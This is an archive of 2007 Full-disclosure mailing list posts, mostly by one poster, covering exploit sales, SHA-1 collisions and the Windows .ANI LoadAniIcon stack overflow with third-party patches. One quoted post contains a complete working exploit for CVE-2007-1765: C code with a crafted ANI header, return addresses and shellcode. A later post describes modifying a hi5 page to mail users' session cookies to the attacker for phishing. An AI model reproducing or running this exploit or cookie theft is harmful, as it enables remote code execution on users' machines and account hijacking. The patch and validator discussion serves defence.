open source projects? should nonprofit groups be forced to pay for
defects that they never asked people to look for?



Good point but I already have a couple of answers to you because that
crossed my mind too.

1- Open Source != 0 profit. 

Re: [Full-disclosure] EXPLOITS FOR SALE (AUCTION SITE)

2007-07-08 Thread wac

On 7/8/07, Dave Hull [EMAIL PROTECTED] wrote:


On 7/8/07, ascii [EMAIL PROTECTED] wrote:

 Dave Hull wrote:
  Yep. This is nothing new (and nothing noble), there are at least a
  handful of web sites that will buy zero days.
 
  Maybe we should start zeBay.

 Because you are noble? Or to start something new?


That was a joke. I thought it was obvious.

The vulnerability researchers that I know and respect have been practicing
responsible full disclosure for years. They aren't in the business of
finding vulnerabilities so they can sell them.



Maybe they don't need the money. I can bet you that there are more that need
it than those that don't.

Responsible full disclosure moves the software industry forward and helps us

all.



Why not encourage research? Companies make a lot of money selling
soft/hard/systems or giving tech support for the very same broken thing. I
think that non security related bug hunting should also be encouraged. And
if it is sold to the biggest bidder then those companies will have to put
more into research, or pay for the information, or be responsible for their own
broken code and the result of letting that information fall into the wrong
hands by not buying it. Unpatched holes are being sold every day and nobody
knows. At least with an open market everybody can know what is around and
even take countermeasures. By not using the software/hardware/system for a
while, for example. You call security what we have today? It is so distant.
Companies sometimes make millions and usually do not want to pay a little
misery for things. Just sell broken things and then wait until somebody
takes care to find the broken stuff. They simply don't care about that. They only
take action after something is found and there is public pressure. And
sometimes not even knowing the information. Don't you think it would be a
good idea to push them a little to do something for their very own clients?
Hey, that means you too.

I believe that's more noble than selling them to the highest bidder,


It is more noble to reward hard-to-do work that also requires a lot of
knowledge, for which sometimes people don't even take the time to say thank
you.

but I understand some people have to put food on their families.


You are completely right. And not only food. Hardware and software can
sometimes be very expensive. It is definitely the kind of job that requires
resources, just to save more somewhere else.

And don't worry about that website. It will never work being so closed. A
market is where everybody can buy/sell. That's far from it.

Regards
Waldo


Re: [Full-disclosure] Rutkowska faces ‘100% undetectable malware’ challenge, teasing?

2007-07-01 Thread wac

Blah blah blah. Please someone tell Rutkowska that we have known about what she
calls blue pill since we were little kids.

It was exposed *years ago* (1995 to be exact, 12 years) by Mark A. Ludwig
in his Giant Book of Computer Viruses, page 391, from American Eagle
Publications, Inc., chapter Protected mode stealth.

Basically it was moving the operating system into userland and running the
virus in ring-0, making it almost undetectable. It was called Isnt, not blue
whatever. Yes well, with Vanderpool technology it should be a lot easier given
the hardware support.

And guess what.. We are still alive even with a POC virus and its source
code available to the public.

I hate that kind of noisy sensationalist press so much. That guy is always
doing it.
And btw I don't believe such a thing to be totally undetectable. There's
always a little catch.

Regards
Waldo


On 6/30/07, Bipin Gautam [EMAIL PROTECTED] wrote:


hi guys,

ref: http://blogs.zdnet.com/security/?p=334

so are they teasing by making her the impossible challenge at this date?
:)

honeypot developers have been trying to battle the same issue of
making the virtual machine emulate the guest OS as if it is run on real
hardware for some years now.

ref: http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf


But if Rutkowska or anyone is able to succeed to make it undetectable
in current hardware that would be genius!

-bipin


Re: [Full-disclosure] Fight Censorship on Full-Disclosure

2007-05-13 Thread wac

On 5/12/07, Dr. Neal Krawetz PhD [EMAIL PROTECTED] wrote:



Hello all,

It was brought to my attention that this list has become moderated.



Moderated? Is that correct? Please let me know. I once saw something
strange. A mail sent to the list months ago bouncing back to me.

As a community, we must not stand for this!  We must join together and

fight the oppression.



Calling for war is bad. Sometimes.

I have decided to host a mirror of the censored materials on my website.

As an American, I value free speech above all else, and will gladly give
my life defending this content.



Great then about the free speech.

George Bush, you can kiss my ass.  I didn't vote for you, and as far as

I am concerned you are not my president and no matter how many of my
Muslim brothers you massacre, I will not be intimidated and I will not
remove this content from my website.



?

Everyone, please download the following file and mirror it where ever

you can.  While it may seem cruel to the individuals named in here,
remember the greater good.  George Bush and his Marxist ways have no
place here on our good list.




http://www.krawetz.org/misc/censorship.txt


What is that about? I mean some addresses of someone. What is that? A fake
list of ppl or what? Could you please explain? It seems to me like something
written by a kid.

*00* intr0duktion -- ~el8 TEaM

Maybe then we'll listen.

- neal

I am the last free man in America. - Dr. Neal Krawetz, PhD




Re: [Full-disclosure] INVASION OF THE CHILD HACKERS

2007-04-16 Thread wac

On 4/16/07, Stack Smasher [EMAIL PROTECTED] wrote:


My daughter is 3 and she has had a laptop of her own since she was 2. You
would be amazed at how much more she likes going to the 6-7 sites I have
bookmarked for her than watching TV. Sesame Street and Nick Jr. are her most
favorite. My parents were over a few weeks ago and were shocked when she
not only plugged the laptop into the wall socket, but turned it on and
went to her favorite web page. Needless to say when she goes to school she
will probably know more than her instructor. I believe that there is a huge
digital divide in the world and I want to make sure my child is
comfortable with technology that is CRITICAL for her success in the future.



Or... her complete failure. Someday the little child could be hitting warez,
mscracks, crackspider or maybe rotten.com (just to mention some of the most
known), going just out there or to a stranger address you are not aware of
to look for the key to run that great little game that refuses to run
because it is protected and... Guess what he/she will see ;)

I really doubt that a 3 year old kid (and I definitely don't believe that
number 2 you said can even type at the keyboard) can handle that
avalanche of pornography and violence without burning/twisting their little
brain. If I were a parent I would wait a little more time until that
technology could maybe be critical, as you call it, instead of playing the
geek parent that teaches his kid to go earlier. Nope, filters are not very
smart and the internet is WILD and it only takes a couple of clicks before you
land on a very strange place. And we all know that. Given the fact that now
there is even emulation on that, it is really scary the little monsters that are
being built out there. Hey, sometimes I can't even handle rotten.com and I have
not been a teen since quite some time ago. Some day I just decided not to visit
that website anymore; imagine a little kid's brain. Hey, you could even
misspell Yahoo or Google and get hacked or get the avalanche in front of
your face. Or maybe type some random stuff into a search engine. Guess what,
robots are not smart enough to get that kind of stuff out of their index and
believe me those guys are busier taking competition and copyrighted
material out of the index than actually caring about taking out that kind of
content. Ohh I forgot, you can also download an exe and execute a little
*program* that automatically tells you "enjoy hot fresh hotties". Sure no
problem, the little hacker will be able to debug it before that happens,
right? Ohh yeahh I forgot, the antivirus will be smart enough to catch a
modified version of Morphine or Yoda's Protector ;)

Regards
Waldo

On 4/16/07, Dr. Neal Krawetz, PhD [EMAIL PROTECTED] wrote:



 I just came across this article: More Women Online. The article
 starts by saying:

 eMarketer estimates that there will be an estimated 97.2
 million female Internet users ages 3 and older in 2007, or 51.7% of
 the total online population. In 2011, 109.7 million US females will
 go online and amounting to 51.9% of the total online population.

 Estimates from other research sources concur that females
 represent the majority of US Internet users, ranging from 53%
 (Arbitron and Edison Media Research and for Internet users ages 12
 and older) down to 50.6% (comScore Media Metrix and for Internet
 users ages 2 and older).


 The increase in women online is only moderately interesting.
 Particularly since surveys from a year ago reported that a majority
 of Internet users under 30-years-old are female.

 However and the thing that really got my attention was the age
 range. They say ages 3 and older. What kind of 3-year-old is
 surfing the web and using IM, and sending email? Between 3 and 5
 years old and most children are just starting to learn the
 alphabet. The average 5-year-old should be able to read simple
 words. Granted, there are some online games for tots and is that
 really the same as using the Internet? (Use a VCR or DVD player?
 Sure and I've seen 2-year-olds do that… But a tot surfing the web?
 Really?)

 All of this makes me wonder… How soon before the RIAA begins suing
 3-year-olds for illegal downloads? I mean and they have already
 gone after a 7-year-old. (And the 7-year-old was female.
 Coincidence? I think not!)  Also, with this many young females
 online, I might need to trade my significant other M. in for a more
 attractive model.  ;-)

 EHAP WATCH OUT!

 - - Dr. Neal Krawetz
 Author of Advanced Desktop Window Resizing Techniques in Ubuntu



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-08 Thread wac

Hello:

Firefox 2.0.0.3 (at least in Windows) *seems to be vulnerable*. I don't
remember exactly what it did but it behaved in a strange way; I believe some
file handle was left open and I had to kill it the hard way. I don't know what
they say in the docs but if it ends up calling the user32 function, that's
all it takes to trigger the bug. I was taking a peek at its import
tables and it imports from User32 the function LoadCursorA; maybe that could
be the guilty one.

anyway test here and see what happens (that link is from dev code)

http://sicotik.com/ink/test.html

I haven't been vulnerable for quite some time ;) and I don't have much
time to test right now

Regards
Waldo

On 4/8/07, Michal Majchrowicz [EMAIL PROTECTED] wrote:


Hi.
There are more and more reports about FF and the ani vulnerability.
There was already a presentation of a working exploit.
The thing starts to annoy me and since I am far away from any Windows
I wanted to share some of my speculations.
According to the docs two things are obvious:
1) Firefox doesn't support ANI cursors
2) ANI is just a few cur cursors packed together and presented as an
animation.
So I have three possible ways of exploiting it:
1) Since ANI files are vulnerable then maybe cur files are also
vulnerable. Firefox does support CUR files.
2) If Firefox doesn't support ANI files it only means it doesn't
render them. It doesn't mean it will not accept them in any way :)
3) Maybe it is possible to take foo.ani and rename it to foo.cur.
Then FF will call the Win API with this cursor. The Windows API will recognize
this as an ANI file and call the vulnerable function.
As I said before these are just speculations. I hope someone will be
able to confirm or prove that some of them (or all) make no sense.
Happy Easter to everyone.
Regards Michal.

On 4/4/07, Peter Ferrie [EMAIL PROTECTED] wrote:
 That's correct, Firefox doesn't support ANI files for cursors.

 Right, and it doesn't need to, because cursors are not the only way to
reach the vulnerable code.
 Icons can do it, too.



[Full-disclosure] another .ani 0-day bug third party patcher more useful this time, version 0.2

2007-04-03 Thread wac

Get it here

binary:
http://aircash.sourceforge.net/micro-distro-0.2-bin.zip

sources:
http://aircash.sourceforge.net/micro-distro-0.2-src.zip


Regards
Waldo Alvarez

[Full-disclosure] Windows .ANI LoadAniIcon third party patch latest version 0.3 (so people can rollback their system before applying the patches)

2007-04-03 Thread wac

Hello:

I see that today I'm getting downloads from the website. Incredible,
yesterday (1:27 am here in -5 GMT) got more than the first day. Well anyway
that could maybe be because people don't know that the Microsoft patch is
out there or... just want to see. Who knows? Well, previous versions were not
completely finished since they didn't contain the unpatch part (however
it seems that was useful for some people since I got no complaints and some
downloads (93) after the first release). However I have no idea of how many
people are using it; I assume that it should be more than 93 since some
distribution should have taken other ways (e-mails, other websites, etc).

Well, if you used the patch and want to uninstall it (I strongly recommend
that), use this version before applying the patch from Microsoft to make
sure everything goes OK; I have no idea if it gives problems or not to apply
the Microsoft patch on top of mine. Even if doing that doesn't give problems,
well, I decided to finish it anyway. I am the kind who likes to be sure and
not to take chances as much as possible. By the way you don't need the saved
backup. I am just patching the patched version with the original bytes. That
should make ppl lose less time (no need to search for the backup) while
doing the restoration ;). I did it that way too since it was not going to take
me much time as it was basically the same. I just copied that code instead
of making a function but hey ... who cares? And.. yes, string handling should
be pretty broken in the two latest versions but again, who cares? There was
no time for that with a worm out there infecting even banks. Yes I know a
couple that use Windows in their servers and in internal networks; I hope
that they are all up to date by now but I doubt it. Sometimes years later
you see the vulnerability in some places. Enough talk for now, let me know
if something is wrong so I can fix it, or... fix it yourself. I gotta sleep.

binaries here:
http://aircash.sourceforge.net/micro-distro-0.3-bin.zip

sources here:
http://aircash.sourceforge.net/micro-distro-0.3-src.zip

Regards
Waldo Alvarez

Re: [Full-disclosure] More information on ZERT patch for ANI 0day

2007-04-02 Thread wac

Well I did my patch and I'm giving it away to be modifiable by everyone out
there.

I did it for version 5.1.2600.2622 of user32.dll, English version; not sure
if that is the last version from M$ (with the way they handle patches you
know you could miss one). Anyway, in any case I believe there is enough
information in the sources if it needs a fix or... not, if Microsoft really
comes with a patch tomorrow. So far you don't have to be at the mercy of the
Chinese worm or evil random cracker. Let me know if it is a POS, if it has
bugs etc... Maybe it is not needed by tomorrow but I was already doing it.
So if it helps.. Then great!!

download binaries here
http://aircash.sourceforge.net/micro-distro-src.zip

and sources here
http://aircash.sourceforge.net/micro-distro-bin.zip

just my 2 cents

Regards
Waldo

On 4/1/07, Gadi Evron [EMAIL PROTECTED] wrote:


Hi, more information about the patch released April 1st can be found here:

http://zert.isotf.org/

Including:
1. Technical information.
2. Why this patch was released when eeye already released a third party
patch.

The newly discovered zero-day vulnerability in the parsing of animated
cursors is very similar to the one previously discovered by eEye that was
patched by Microsoft in MS05-002. Basically an anih chunk in an animated
cursor RIFF file is read into a stack buffer of a fixed size (36
bytes) but the actual memory copy operation uses the length field provided
inside the anih chunk, giving an attacker an easy route to overflow the
stack and gain control of the execution of the process.

With the MS05-002 patch, Microsoft added a check for the length of the
chunk before copying it to the buffer. However, they neglected to audit
the rest of the code for any other instances of the vulnerable copy
routine. As it turns out, if there are two anih chunks in the file, the
second chunk will be handled by a separate piece of code which Microsoft
did not fix. This is what the authors of the zero-day discovered.

Although eEye has released a third-party patch that will prevent the
latest exploit from working, it doesn't fix the flawed copy routine. It
simply requires that any cursors loaded must reside within the Windows
directory (typically C:\WINDOWS\ or C:\WINNT\). This approach should
successfully mitigate most drive-bys, but might be bypassed by an
attacker with access to this directory.

For this reason, ZERT is releasing a patch which addresses the core of the
vulnerability, by ensuring that no more than 36 bytes of an anih chunk
will be copied to the stack buffer, thus eliminating all potential exploit
paths while maintaining compatibility with well-formatted animated cursor
files.

Gadi.

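As an added example (not ZERT's, eEye's or any list poster's code), a defensive validator in C for the chunk structure Gadi describes: it walks every chunk of a RIFF/ACON file and rejects any anih chunk whose declared length is not 36 bytes, giving a second anih chunk exactly the same check as the first, which is the path the original fix missed. The chunk names and the 36-byte size come from the post above; the sample files are constructed inline, and the function names and status codes are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The post above gives 36 bytes as the stack buffer an anih chunk is copied into. */
#define ANIH_EXPECTED_SIZE 36u

/* NOT_ACON: not a RIFF/ACON file; TRUNCATED: a declared size runs past the data;
 * ANIH_SIZE: an anih chunk declares a size other than 36; NO_ANIH: none present. */
typedef enum { ANI_OK = 0, ANI_ERR_NOT_ACON, ANI_ERR_TRUNCATED,
               ANI_ERR_ANIH_SIZE, ANI_ERR_NO_ANIH } ani_status;

static uint32_t rd32le(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr32le(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Walk every top-level chunk and apply the 36-byte rule to each anih chunk, so a
 * second anih chunk gets exactly the same check as the first. Every declared size
 * is bounds-checked before it is trusted. *anih_count reports how many were seen. */
ani_status ani_validate(const uint8_t *buf, size_t len, unsigned *anih_count)
{
    unsigned seen = 0;
    *anih_count = 0;
    if (len < 12)
        return ANI_ERR_TRUNCATED;
    if (memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "ACON", 4) != 0)
        return ANI_ERR_NOT_ACON;
    uint32_t riff_size = rd32le(buf + 4);        /* bytes after the 8-byte RIFF header */
    if (riff_size < 4 || (size_t)riff_size > len - 8)
        return ANI_ERR_TRUNCATED;
    size_t end = 8 + riff_size;
    size_t off = 12;                             /* first chunk follows the ACON form type */
    while (off < end) {
        if (end - off < 8)
            return ANI_ERR_TRUNCATED;            /* no room for a chunk id and size */
        uint32_t csize = rd32le(buf + off + 4);
        size_t body = off + 8;
        if (memcmp(buf + off, "anih", 4) == 0) {
            *anih_count = ++seen;
            if (csize != ANIH_EXPECTED_SIZE)     /* the MS05-002 check, applied to every anih */
                return ANI_ERR_ANIH_SIZE;
        }
        if (csize > end - body)
            return ANI_ERR_TRUNCATED;            /* declared length exceeds the data */
        off = body + csize + (csize & 1u);       /* other chunks are opaque; RIFF pads odd sizes */
    }
    return seen ? ANI_OK : ANI_ERR_NO_ANIH;
}

/* Constructed sample input (not a real cursor): a RIFF/ACON container holding one anih
 * chunk per entry of sizes[], each with that declared size and a zero-filled body of the
 * same length. Returns the total length, or 0 if cap is too small. */
size_t build_ani(uint8_t *out, size_t cap, const uint32_t *sizes, unsigned n)
{
    size_t off = 12;
    if (cap < off)
        return 0;
    for (unsigned i = 0; i < n; i++) {
        size_t body = (size_t)sizes[i] + (sizes[i] & 1u);
        if (cap - off < 8 + body)
            return 0;
        memcpy(out + off, "anih", 4);
        wr32le(out + off + 4, sizes[i]);
        memset(out + off + 8, 0, body);
        off += 8 + body;
    }
    memcpy(out, "RIFF", 4);
    wr32le(out + 4, (uint32_t)(off - 8));
    memcpy(out + 8, "ACON", 4);
    return off;
}

/* Build a sample with the given anih sizes and validate it in one step. */
ani_status validate_built(const uint32_t *sizes, unsigned n, unsigned *anih_count)
{
    uint8_t buf[4096];
    size_t len = build_ani(buf, sizeof buf, sizes, n);
    *anih_count = 0;
    return len ? ani_validate(buf, len, anih_count) : ANI_ERR_TRUNCATED;
}

int main(void)
{
    static const char *names[] = { "OK", "NOT_ACON", "TRUNCATED", "ANIH_SIZE", "NO_ANIH" };
    const uint32_t well_formed[] = { 36 };
    const uint32_t second_oversized[] = { 36, 1024 };   /* the path the first fix missed */
    unsigned count;
    ani_status s = validate_built(well_formed, 1, &count);
    printf("one 36-byte anih      -> %s (anih chunks seen: %u)\n", names[s], count);
    s = validate_built(second_oversized, 2, &count);
    printf("second anih oversized -> %s (anih chunks seen: %u)\n", names[s], count);
    return 0;
}
```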

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-01 Thread wac

On 4/1/07, Larry Seltzer [EMAIL PROTECTED] wrote:


The issue is that this only works with DEP turned off!

Interesting point. I haven't seen this mentioned anywhere, including the
Microsoft advisory
(http://www.microsoft.com/technet/security/advisory/935423.mspx).

Has anyone actually tested this with DEP on/off to be sure?



Yes, WinHex uses the function when you open the .ani and I don't have it
running with DEP turned on, and the same goes for Firefox, which also leaves
the file open when I opened the web link dev sent me (already tested WinHex
with the address of ExitProcess that btw seems to float around from system
to system since the version dev sent me does not work for me and it works
like a charm when I built it). I was talking with dev code about DEP
bypassing btw; we think that it is possible to exploit even with DEP ON.
Just ideas for now.

Larry Seltzer

eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry_seltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED]


Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-03-31 Thread wac

Hello:

Does this work in *fully patched* XP pro + SP2? Mine seems to be totally
immune (not even crashing). XP Pro + SP2 + 0 patches crashes (probably
landing somewhere else in memory).


On 3/30/07, dev code [EMAIL PROTECTED] wrote:


/*
* Copyright (c) 2007 devcode
*
*
*   ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
*   A vulnerability has been identified in Microsoft Windows,
*   which could be exploited by remote attackers to take complete
*   control of an affected system. This issue is due to a stack overflow
*   error within the LoadAniIcon() [user32.dll] function when rendering
*   cursors, animated cursors or icons with a malformed header, which could
*   be exploited by remote attackers to execute arbitrary commands by
*   tricking a user into visiting a malicious web page or viewing an email
*   message containing a specially crafted ANI file.
*
* Hotfix/Patch:
*   None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 2
* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 (Itanium)
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
* Microsoft Windows Server 2003 x64 Edition
* Microsoft Windows Vista
*
* Microsoft Internet Explorer 6
* Microsoft Internet Explorer 7
*
*   This is a PoC and was created for educational purposes only. The
*   author is not held responsible if this PoC does not work or is
*   used for any other purposes than the one stated above.
*
* Notes:
*   For this to work on XP SP2 on explorer.exe, DEP has to be turned
*   off.
*
*/
#include <iostream>
#include <cstdio>    /* printf, fopen, fwrite, fclose */
#include <cstring>   /* memset, memcpy */
#include <cstdlib>   /* atoi */

/* ANI Header: RIFF/ACON container, first anih of 36 bytes, then a second
   anih chunk whose declared size (0x3A8) is what overflows the stack buffer */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";

/* Shellcode - metasploit exec calc.exe ^^ */
unsigned char uszShellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";

char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\tWindows XP SP2 [0]\n"
"\tWindows 2K SP4 [1]\n\n"
"Usage: ani.exe <target> <file>";

typedef struct {
    const char *szTarget;
    unsigned char uszRet[5];
} TARGET;

TARGET targets[] = {
    { "Windows XP SP2", "\xC9\x29\xD4\x77" },   /* call esp */
    { "Windows 2K SP4", "\x29\x4C\xE1\x77" }
};

int main( int argc, char **argv ) {
    char szBuffer[1024];
    FILE *f;

    if ( argc < 3 ) {
        printf( "%s\n", szIntro );
        return 0;
    }

    printf( "[+] Creating ANI header...\n" );
    memset( szBuffer, 0x90, sizeof( szBuffer ) );   /* NOP sled fills the rest */
    memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );

    printf( "[+] Copying shellcode...\n" );
    memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );   /* saved return address */
    memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );

    printf( "%s\n", argv[2] );
    f = fopen( argv[2], "wb" );
    if ( f == NULL ) {
        printf( "[-] Cannot create file\n" );
        return 0;
    }

    fwrite( szBuffer, 1, 1024, f );
    fclose( f );
    return 0;
}

Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)

2007-03-25 Thread wac

Hello:

On 3/24/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:


On Sat, 24 Mar 2007 11:48:10 CDT, wac said:

 Of course not, it is enough to find a collision and you'll get for example
 a message signed by somebody else that looks completely authentic since
 signatures encrypt that hash with the private key.

No, if you have a signature to some text, you need to find a collision to a
specified value - the one the signature covers.



That is what I mean. If the original hash was 0x1234 (assuming 16 bits) and you
want a signed text that looks signed by the private key's holder you have to
construct a text with the same 0x1234 hash. That is where collisions would
come into the game.

For instance, if you have a 16 bit hash, finding two texts that both have a
hash value of 0x1F6E doesn't do you much good if the signature is for 0x4ED2.
And due to the birthday paradox, finding any pair of colliding hashes is a
lot easier than finding a collision to a specific hash.



We are assuming that it was cracked right? I believe that it means if you
can find something, let's call it Y, that has the same output from the hash
function as the original, H(X) = H(Y), let's call the original signed content
X. Of course it does not seem to me that SHA-1 was cracked, it was IMHO at
most weakened and some collision was found, but to call it cracked is
well... too strong. In my opinion it is a claim made by the one who claims it
to be famous or something, twisting the truth a little. To me something half
true is a lie. Also I was not referring of course to finding a pair of
colliding hashes since that would be pointless (yes well maybe it has some use,
who knows). We all know that they collide and collisions exist. The pigeon
hole principle right? BTW does somebody have a paper where that SHA-1 crack is
clearly explained? I would like to read it and not trust such claims just
because somebody says so (I don't mean that it is not true, I just want to think
by myself, it could be possible that some rounds could be... well...
simplified). Haven't found any paper about it. Just things like this
http://theory.csail.mit.edu/~yiqun/shanote.pdf that just gives a collision
example. But nothing about the weaknesses of the algorithm. And this is old
news. BTW very interesting that birthday paradox.

And being able to force a collision to a specific hash may not be very
useful all by itself - for instance, if you're trying to collide the hash
that the PGP signature covers in this message, you *might* be able to find
a string of bits.  But you won't be able to make it a *plausible* signature
unless your string of bits is *also* a chunk of English text, that reads as
if I wrote it.  So not only do you need to be able to collide a specific
hash, you need to do so with at least *some* control over the content of
the text, which is even harder.



Well you could add some garbage at the end of the message. In a text message
it would call attention that something is wrong (maybe because it is signed and
you would not be able to tell if the key holder signed a text with that
garbage at the end or somewhere else), but not on binary content, for example
a driver or an executable image that simply skips the garbage that causes
the collision when executed. Although a weakness will be of help to
accomplish this, making the attack take less time. However if the attack
takes let's say 10 000 years instead of 1000 000 it is well... almost the same
thing.
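The two search costs the thread is comparing (any colliding pair versus a match to one fixed digest), as an added example in C that is not part of any post here. It uses a constructed 16-bit toy hash in place of SHA-1, like the 16-bit illustration above, and treats the message 1234 as the signed content; both are this example's own assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed 16-bit toy hash standing in for the thread's 16-bit example:
 * an FNV-1a style mix over the four bytes of a 32-bit message, folded and
 * truncated to 16 bits. It is not SHA-1; any n-bit hash that behaves
 * randomly shows the same two costs. */
#define HASH_BITS 16
#define HASH_SPACE (1u << HASH_BITS)

uint16_t toy_hash(uint32_t msg)
{
    uint32_t h = 2166136261u;
    int i;
    for (i = 0; i < 4; i++) {
        h ^= (msg >> (8 * i)) & 0xffu;
        h *= 16777619u;
    }
    h ^= h >> 16;                      /* fold the top half in before truncating */
    return (uint16_t)(h & (HASH_SPACE - 1));
}

/* Birthday search: hash the messages 0, 1, 2, ... and remember the first
 * message seen for each digest. Stores the first pair of distinct messages
 * with equal digests and returns how many hashes were computed. Expected
 * cost is about sqrt(pi/2 * 2^n), roughly 321 here; the pigeonhole principle
 * guarantees a hit after at most 2^n + 1 hashes. */
uint32_t find_any_collision(uint32_t *a, uint32_t *b)
{
    static uint32_t first_seen[HASH_SPACE];
    static unsigned char used[HASH_SPACE];
    uint32_t m;
    memset(used, 0, sizeof used);
    for (m = 0; m <= HASH_SPACE; m++) {
        uint16_t d = toy_hash(m);
        if (used[d]) {
            *a = first_seen[d];
            *b = m;
            return m + 1;
        }
        used[d] = 1;
        first_seen[d] = m;
    }
    return 0;   /* unreachable: a collision is forced by the loop bound above */
}

/* Second-preimage search: find a message other than x with x's digest, which
 * is what forging a signature over a given text needs. No table helps here;
 * each trial matches with probability 2^-n, so the expected cost is about
 * 2^n hashes. Returns the number of hashes computed, or 0 if the cap is hit. */
uint32_t find_second_preimage(uint32_t x, uint32_t *y)
{
    uint16_t target = toy_hash(x);
    uint32_t m, tried = 0;
    for (m = x + 1; m != x; m++) {      /* wraps around the 32-bit message space */
        tried++;
        if (toy_hash(m) == target) {
            *y = m;
            return tried;
        }
        if (tried == (1u << 24))        /* 256 times the digest space: give up */
            break;
    }
    return 0;
}

int main(void)
{
    uint32_t a = 0, b = 0, y = 0;
    uint32_t x = 1234u;                 /* constructed: the "signed" message */
    uint32_t c = find_any_collision(&a, &b);
    uint32_t t = find_second_preimage(x, &y);
    printf("any collision:   %u hashes (msgs %u and %u -> 0x%04x)\n",
           (unsigned)c, (unsigned)a, (unsigned)b, (unsigned)toy_hash(a));
    printf("second preimage: %u hashes (msg %u -> 0x%04x, same as msg %u)\n",
           (unsigned)t, (unsigned)y, (unsigned)toy_hash(y), (unsigned)x);
    return 0;
}
```

Running it side by side shows the gap the birthday paradox opens: the first search stops after a few hundred hashes, the second typically needs tens of thousands for the same 16-bit digest.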

Re: [Full-disclosure] hi5 Antiphishing Departement

2007-03-25 Thread wac

Yep it works. I cloned that and modified it to mail me the user cookie, see
http://bottester.hi5.com You have to be logged in to make it work ok. Sometimes
it doesn't work correctly, it takes you to the home page. Try several times.
No idea why. Sometimes when you modify your profile in hi5 you have to do it
two or three times until it works. Maybe they have some broken code when
updating the database. Adding the subject seems to break it, anyway it works
well as a phishing attack since you can tell the user to fill that field.

On 3/24/07, beNi [EMAIL PROTECTED] wrote:


I felt the need to extend the list of Antiphishing Departements of some
Social Networks, so the Myspace Antiphishing Departement (
http://www.myspace.com/antiphishing ) got another friend,
